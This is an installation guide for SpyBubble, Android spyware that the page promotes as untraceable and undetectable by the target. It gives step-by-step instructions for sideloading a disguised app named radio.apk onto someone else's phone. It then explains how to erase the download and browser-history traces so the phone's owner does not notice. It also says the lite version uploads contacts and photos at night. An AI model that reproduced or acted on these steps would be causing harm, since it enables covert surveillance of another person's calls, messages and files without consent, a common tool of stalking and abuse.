Tablet PC, iPad Monitoring and
If you are already a client of SpyBubble, after installing the program, go here to get the information you want right away http://cp.spybubble.com/userlogin.php. You’ll need the username and password that you created when you opened an account with us. If you forgot your password, go here: http://cp.spybubble.com/forgotpass.php
If you haven’t created an account with us, go here to get one right now: http://spybubble.com/register.php.
Remember, SpyBubble is the Android spy software that is completely untraceable and undetectable by the target. We know that the information that you are looking for is extremely sensitive and that’s why we went to great lengths to test our software in every circumstance imaginable in order to make sure that you have an extremely effective and completely discreet tool at your disposal.
Note: You do not need to connect your phone to your computer to install SpyBubble on it.
1. On the target phone, press the Home key. Then select Settings and then Application. Check the Unknown Sources checkbox.
If this option is not available in your phone Click here. There is a software which you can use to enable third party installation.
2. Now choose the spybubble version according to your target phone model as below.
- If your target phone is any Motorola Phone / LG Phone / HTC EVO 4G use http://www.spybubble.com/android/lite/radio.apk.
- For any other model use http://www.spybubble.com/android/radio.apk .
In either case open the web browser on the phone. In the address bar, type the link you have chosen and then click on Go. The application file will be stored on the phone.
Please note that if you choose to download the lite version (1st link in Step 2), the contacts and photos will be uploaded to the server at midnight(12 AM to 4 AM) when the phone is not being used.
3. Now open the web browser on the phone. Press Menu and click on -More. You should see an option downloads. Click on this and you should see the radio.apk file that gets downloaded in step 2. Click on the apk file It should start the installation. If this does not work, you need to install APKInstaller. Click here to know how to install it.
4. Once you’ve installed SpyBubble, turn off and on again your phone to reboot it. Just wait for few seconds till you see the screen mentioned in step 5.
5. Click on Accept button to accept the ERMS AND CONDITIONS.
6. Lastly, you need to register your license key. Enter your license key and click on Submit button.
Please note that you may have to wait for few seconds after clicking on the submit button before you see the successful message.
Remove Installation File: Open the Internet browser and go to Menu->More->Downloads .You will then see the installation file radio.apk . Press and hold your finger on this entry until a menu appears. From the options available chose Clear from list and delete.
Delete download link : To do this you should open the Internet Browser and go to Menu->More->History . You will see spybubble.com . Press and hold your finger on this entry until a menu appears. From the options available choose Remove from history.
You are now ready to use SpyBubble. Call the phone and send some messages as a text. Logs will start showing in your online account after a few minutes. To check that the calls and texts are being registered, log into the system from any computer with Internet access: http://cp.spybubble.com/userlogin.php.
To remove SpyBubble from the target phone, follow the below steps.
1. Click on the Settings menu .
2. Click on the Application menu.
3. Click on the Manage Applications menu.
4. This page includes all the installed Applications. Click on radio in the list of applications.
5. Click on the Uninstall menu.
6. The next screen will ask you to confirm deletion. Click on OK button.
7. SpyBubble will be removed from the target phone